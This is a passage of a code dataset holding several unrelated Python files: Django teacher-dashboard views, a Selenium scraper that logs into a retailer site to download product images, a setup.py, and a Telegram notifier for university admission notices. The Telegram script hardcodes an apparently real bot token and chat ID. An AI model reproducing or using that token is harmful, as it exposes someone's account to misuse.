session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n notrecentlyloggedin = Query.get_students_not_logged_in_by_class(teacherkey,classkey)\n\n t = loader.get_template('Dashboard/notrecentlyloggedin_byclass')\n c = Context({'notrecentlyloggedinbyclass': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallsubject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n averagemasterybysubject = Query.get_average_mastery_all_subject_detailed(teacherkey,classkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allsubject')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_assessment_coverage_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_class(teacherkey,classkey)\n logging.error(\"&&&&&&&&&&&&&&&&&&777\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoveragebyclass')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_subject_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n logging.error(classkey)\n subjectdict = Query.get_subject_details_of_teacher_in_class(teacherkey,classkey)\n t = loader.get_template('Dashboard/getsubjectofclass')\n c = Context({'getsubjectofclass': subjectdict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_readytolearn_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n logging.error(\"99999999999999999999999999999999\")\n readytolearn = Query.get_ready_to_learn_of_class(teacherkey,classkey,subjectkey)\n t = loader.get_template('Dashboard/readytolearn_ofsubjectofclass')\n c = Context({'readytolearndict': readytolearn,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_assessment_coverage_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_subject(teacherkey,classkey,subjectkey)\n logging.error(\"101010\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoverageofsubject')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_averagemastery_of_subject_topicwise(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n averagemasteryofsubject = Query.get_average_mastery_of_a_subject(teacherkey,classkey,subjectkey)\n logging.error(averagemasteryofsubject)\n t = loader.get_template('Dashboard/averagemasteryofsubjecttopicwise')\n c = Context({'averagemasterydict': averagemasteryofsubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n", "sub_path": "AssessingPie/teacher_dashboard_data.py", "file_name": "teacher_dashboard_data.py", "file_ext": "py", "file_size_in_byte": 6305, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "gaesessions.get_current_session", "line_number": 11, "usage_type": "call"}, {"api_name": "Query.get_students_not_logged_in_by_class", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 15, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 16, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 16, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 22, "usage_type": "call"}, {"api_name": "Query.get_mastery_by_student_of_class", "line_number": 24, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 26, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 26, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 27, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 28, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 31, "usage_type": "call"}, {"api_name": "Query.get_students_not_logged_in_of_all_class", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 34, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 35, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 35, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 40, "usage_type": "call"}, {"api_name": "Query.get_average_mastery_by_subject_of_all_class", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 44, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 44, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 49, "usage_type": "call"}, {"api_name": "Query.get_class_details_of_teacher", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 53, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 53, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 58, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 61, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 61, "usage_type": "name"}, {"api_name": "Query.get_students_not_logged_in_by_class", "line_number": 62, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 64, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 64, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 65, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 66, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 69, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 72, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 72, "usage_type": "name"}, {"api_name": "Query.get_average_mastery_all_subject_detailed", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 74, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 75, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 75, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 76, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 77, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 84, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 84, "usage_type": "name"}, {"api_name": "Query.get_assessment_coverage_of_class", "line_number": 85, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 87, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 87, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 92, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 95, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 95, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 96, "usage_type": "call"}, {"api_name": "Query.get_subject_details_of_teacher_in_class", "line_number": 97, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 98, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 98, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 103, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 106, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 106, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 108, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 109, "usage_type": "call"}, {"api_name": "Query.get_ready_to_learn_of_class", "line_number": 110, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 111, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 111, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 113, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 116, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 119, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 119, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 121, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 121, "usage_type": "name"}, {"api_name": "Query.get_assessment_coverage_of_subject", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 123, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 124, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 125, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 130, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 133, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 133, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 135, "usage_type": "name"}, {"api_name": "Query.get_average_mastery_of_a_subject", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 138, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 138, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 140, "usage_type": "call"}]} {"seq_id": "483444712", "text": "'''\nAutor: Marcos Felipe da Silva\nversão: 1.5\ndata: 18-11-2019\n------------------------------\nAcessar o site da luxottica, se autenticar, navegar nos menus, retirar imagens e sair\n------------------------------\nHistorico:\nv1.0 Acessa site da luxottica, autentica navega sobre os menus e extrai as imagens das armações\nv1.1 Agora com melhorias de erros, controla a gravação das imagens, reconhece imagens não encontradas\n e gera log dos links de imagens que foram obtidas como gifs\nv1.2 Acertado problema onde o script nao estava saltando para a proxima pagina dentro da grife.\nv1.3 Incluso o atendimento a uma execao quando for baixar imagem e tambem incluso o scrollTo para rolar abaixo na tela\nV1.4 Salva o local onde se encontra o fluxo de download para retomar do ponto onde parou.\nv1.5 Baixa imagens de tamanho maior para melhorar visualização das mesmas.\n'''\n\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport selenium.common.exceptions\nfrom bs4 import BeautifulSoup as bfs\nfrom urllib.request import urlretrieve\nfrom time import sleep\nfrom chave_api import chave\nimport re, os, urllib, pickle\n\n\nchrome_driver = '../chrome/chromedriver'\nurl = 'https://my.luxottica.com'\n## Opcoes do chrome\nopt = ChromeOptions()\nopt.add_argument('--headless')\n\ntempo = 2 # tempo de espera dos processos\n# Arquivo que contem o indice de onde a busca de armações parou\nARQUIVO_INDICE_GRIFES = 'grifes.pickle'\n#\n\ndados_salvos = {\n 'grife': 0,\n 'pag_atual':1 \n}\n# CARREGANDO O INDICE ATUAL (SE EXISTIR)\nif os.path.exists(ARQUIVO_INDICE_GRIFES):\n with open(ARQUIVO_INDICE_GRIFES, 'rb') as arq:\n dados_salvos = pickle.load(arq)\n\n\nclass Luxottica:\n\n def __init__(self, url, pag_atual):\n self._url = url\n self.__driver = Chrome(chrome_driver, options=opt)\n self.__driver.get(url)\n self._regex_grifes = {'data-analytics': re.compile('.*')}\n self._pag_atual = pag_atual # controla o indice atual da pagina\n self._grife_atual = None\n self._modelo_atual = None\n self._cor_atual = None\n \n sleep(2)\n \n def login(self):\n cpUser = self.__driver.find_element_by_name('logonId')\n cpPasswd = self.__driver.find_element_by_name('logonPassword')\n bt = self.__driver.find_element_by_xpath('//button[@type=\"submit\"]')\n # Envaindo usuario e senha\n cpUser.clear();cpUser.send_keys(chave['usuario'])\n #sleep(1)\n cpPasswd.clear();cpPasswd.send_keys(chave['senha'])\n #sleep(1)\n bt.click()\n sleep(1)\n self.selecao_grife()\n sleep(2)\n self.quit()\n return True\n \n def quit(self):\n self.__driver.quit()\n\n def selecao_grife(self):\n ''' Metodo seleciona a grife informada procurando por data-analytics'''\n # Recupere e exiba todas as grifes disponiveis\n bs = bfs(self.__driver.page_source, 'html5lib')\n # Obtem os links\n todas = bs.find('ul', {'class':'brand-element product toAnalytics'}).find_all('a', self._regex_grifes)\n for num, t in enumerate(todas[dados_salvos['grife']:], dados_salvos['grife']):\n # SALVANDO A POSICAO ATUAL QUE ESTOU\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n dados_salvos['grife'] = num\n pickle.dump(dados_salvos, arq)\n\n self.__driver.get(t['href'])\n sleep(tempo)\n while True: # Equanto tiver pagina para seguir adiante\n sleep(tempo) # temp\n pagina_atual = self.__driver.current_url\n self._grife_atual = t['data-analytics'].strip() # Pega o nome da grife atual\n # VER SE JA FOI CARREGADO\n try:\n element = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, 'a.current'))\n )\n bs = bfs(self.__driver.page_source, 'html5lib')\n finally:\n pag_atual = int(bs.find('a', {'class': 'current'}).get_text())\n # SE self._pag_atual FOR MAIOR QUE pag_atual VA AVANCANDO ATE A PAGINA QUE PRECISA ESTAR\n if self._pag_atual > pag_atual: # AVANCE UMA PAGINA\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n continue\n\n\n\n print('PAGINA ATUAL %d' % int(pag_atual))\n # Selecione os modelos\n modelos = bs.find('section', {'class': 'product-grid'}).find('ul').find_all('div', {'class': 'wrap-link'})\n # passe cada mode para ter sua imagem extraida\n for md in modelos:\n self._modelo_atual = md.find('h3', {'class': 'model-code'})['data-analytics'].strip()\n href = md.find('a')['href']\n self.selecao_modelo(href)\n self._modelo_atual = None # zerando o modelo\n # acabou a pagina, passe para a outra (procure por data-analytics=\" NEXT\")\n nextLink = bs.find('a', {'data-analytics': \" NEXT\"})\n if nextLink:\n # RECUPERAR O OBJETO AGORA\n self.__driver.get(pagina_atual)\n sleep(tempo)\n elemento = None\n try: # Espere o icone do data-analytics aparecer\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[@data-analytics=\" NEXT\"]'))\n )\n except selenium.common.exceptions.StaleElementReferenceException:\n print('NAO ENCONTRADO BOTAO PARA CLICK ')\n print(self.__driver.page_source)\n finally:\n if not elemento is None:\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n self._pag_atual += 1\n # Salvar posicao atual da pagina\n self.salvar_dados()\n print('PASSANDO A PROXIMA PAGINA')\n else: # Chegamos ao fim. passando para a proxima familia\n print('FIM DA GRIFE ----------->')\n self._pag_atual = 1\n self.salvar_dados()\n break\n\n self._grife_atual = None # Zerando a grife\n\n def salvar_dados(self):\n ''' Salva a pagina atual e a grife que se encontra '''\n dados_salvos['pag_atual'] = self._pag_atual\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n pickle.dump(dados_salvos, arq)\n \n \n def selecao_modelo(self, modelo):\n ''' Metodo seleciona o modelo ORJ9052S e então passa as cores '''\n #\n self.__driver.get(modelo)\n sleep(tempo)\n # Da uma navegada na pagina para carregar ela por completo\n for i in range(1, 8):\n self.__driver.execute_script('window.scrollTo(0, %d);' % (i * 200))\n sleep(.5)\n \n bs = bfs(self.__driver.page_source, 'html5lib')\n #Se prosseguir com erro vamos tratar a exceção\"\n elemento = None\n try:\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//table[@id=\"brand-products-info\"]'))\n )\n if not elemento is None: todos_itens = bs.find('table', {'id':'brand-products-info'}).find('tbody').find_all('tr')\n except selenium.common.exceptions.TimeoutException:\n pass\n finally:\n if elemento is None or not elemento:\n print(elemento) \n print('NÃO ENCONTROU CONJUNTO DE CORES')\n todos_itens = []\n \n for item in todos_itens:\n print(self._grife_atual, '_', self._modelo_atual, '_', item['data-color'])\n self._cor_atual = item['data-color'].strip().replace('/', '--')\n imagem = item.find('td', {'class':'first'}).find('img', {'class':'images lazy'})\n self.selecao_cor(self._url+imagem['src'])\n #sleep(tempo) não é necessário um tempo\n self._cor_atual = None # Zerando a cor\n\n def selecao_cor(self, cor):\n ''' FINALMENTE NA SELECAO DE COR CONSEGUE-SE BAIXAR a imagem desejada '''\n #NECESSARIO LIDAR COM IMAGENS QUE NAO EXISTAM urllib.error.HTTPError: HTTP Error 404: Not Found\n nome, ext = os.path.basename(cor).rsplit('.', 1)\n nome_arquivo = '_'.join([self._grife_atual, self._modelo_atual, self._cor_atual])+'.'+ext\n # Todos que são .gif devem ser armazenados no arquivo gifs.log\n if ext == 'gif':\n with open('gifs.log', 'a') as arq:\n arq.write('%s \\n' % (nome_arquivo))\n return False\n \n if not os.path.exists('imagens/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n try:\n urlretrieve(cor, 'imagens/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, cor, str(err)))\n # VEJA SE O ARQUIVO DE RESOLUCAO MAIOR TAMBÉM NAO EXISTE, SE NÃO EXISTIR SALVE\n if not os.path.exists('imagens_maior/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n # troque 222x111 por 890x445\n novo_cor = cor.replace('222x111', '890x445')\n try:\n urlretrieve(novo_cor, 'imagens_maior/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, novo_cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, novo_cor, str(err)))\n\n\nif __name__ == '__main__':\n # Instanciando a Luxottica e ativando o login\n l = Luxottica(url, dados_salvos['pag_atual'])\n l.login()\n\n\n", "sub_path": "luxottica/luxottica.py", "file_name": "luxottica.py", "file_ext": "py", "file_size_in_byte": 10712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "chave_api.chave", "line_number": 71, "usage_type": "name"}, {"api_name": "chave_api.chave", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 88, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 100, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 105, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 106, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 106, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 106, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 106, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 135, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 136, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 136, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 136, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 136, "usage_type": "name"}, {"api_name": "selenium.webdriver.common", "line_number": 138, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 138, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 160, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 167, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 173, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 177, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 178, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 178, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 178, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 178, "usage_type": "name"}, {"api_name": "selenium.webdriver.common", "line_number": 181, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 210, "usage_type": "call"}, {"api_name": "urllib.error", "line_number": 211, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 224, "usage_type": "call"}, {"api_name": "urllib.error", "line_number": 225, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 229, "usage_type": "attribute"}]} {"seq_id": "152346558", "text": "\"\"\"\nThis file contains the current state of packaging in Python using\nDistribution Utilities (Distutils) and its extension from the end\nuser'point-of-view.\n\nDocumentation:\nhttps://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/introduction.html\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"timst\"\n\n# Used for pytest and code coverage\nTESTS_REQUIEREMENTS = [\"pytest\", \"pytest-cov\"]\n# Depending on the documents more dependencies can be added\nDOCS_REQUIEREMENTS = [\"recommonmark\", \"sphinx_rtd_theme\", \"sphinxcontrib-bibtex\"]\n# Dependencies for the packages\nPACKAGE_REQUIEREMENTS = [\"numpy\", \"torch\", \"tqdm\", \"torchvision\"]\n\n# Read through Readme\ntry:\n this_directory = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\nexcept IOError:\n print(\"Read me file not found.\")\n\n\ndef get_version():\n \"\"\"Gets the version from the package's __init__ file\n if there is some problem, this fails.\n \"\"\"\n VERSIONFILE = os.path.join(\"src\", PACKAGE, \"__init__.py\")\n initfile_lines = open(VERSIONFILE, \"rt\").readlines()\n VSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n\n\nsetup(\n name=PACKAGE,\n version=get_version(),\n description=\"Image style transfer using Torch\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Tanjona R. Rabemananjara\",\n author_email=\"tanjona.rabemananjara@mi.infn.it\",\n url=\"https://github.com/Radonirinaunimi/Style-Transfer\",\n install_requires=PACKAGE_REQUIEREMENTS,\n extras_require={\"docs\": DOCS_REQUIEREMENTS, \"tests\": TESTS_REQUIEREMENTS},\n entry_points={\"console_scripts\": [\"timst = timst.run:main\", ]},\n package_dir={\"\": \"src\"},\n packages=find_packages(\"src\"),\n package_data={\"\": [\"logo/logo.png\"], },\n classifiers=[\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n setup_requires=[\"wheel\"],\n python_requires='>=3.6'\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "re.M", "line_number": 42, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 47, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 60, "usage_type": "call"}]} {"seq_id": "10839188", "text": "from bs4 import BeautifulSoup\nimport requests\nimport os\nimport telegram\n\nmy_token = '509374426:AAHLko_Iht5oulMOo8tBTAbd52vYyFL8GwU'\nbot = telegram.Bot(token=my_token)\nupdate = bot.get_updates()\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nreq = requests.get('http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\nreq.encoding = 'euc-kr'\n\nhtml = req.text\nsoup = BeautifulSoup(html, 'html.parser')\nposts = soup.select('div.article > div > table > tbody > tr > td.al > a')\nsave = posts[-1].text\n\n# for i in posts:ㅇ\n# # print(i)\n# print(i.text)\n\nwith open(os.path.join(BASE_DIR, 'cau.txt'), 'r+') as f_read:\n before = f_read.readline()\n if before != save:\n bot.sendMessage(chat_id='384222529', text='중앙대 편입학 새공지가 있습니다.')\n bot.sendMessage(chat_id='384222529', text='http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\n\n with open(os.path.join(BASE_DIR, 'cau.txt'), 'w+') as f_write:\n f_write.write(save)\n f_write.close()\n\n f_read.close()\n", "sub_path": "transfer_cau.py", "file_name": "transfer_cau.py", "file_ext": "py", "file_size_in_byte": 1072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "telegram.Bot", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} {"seq_id": "355522747", "text": "# -*- coding: utf-8 -*-\n\nimport os\n\nimport h5py\n\nfrom tvb_scripts.io.h5_writer import H5Writer\nfrom tvb_scripts.utils.log_error_utils import initialize_logger\n\n\nclass H5ReaderBase(object):\n logger = initialize_logger(__name__)\n\n H5_TYPE_ATTRIBUTE = H5Writer().H5_TYPE_ATTRIBUTE\n 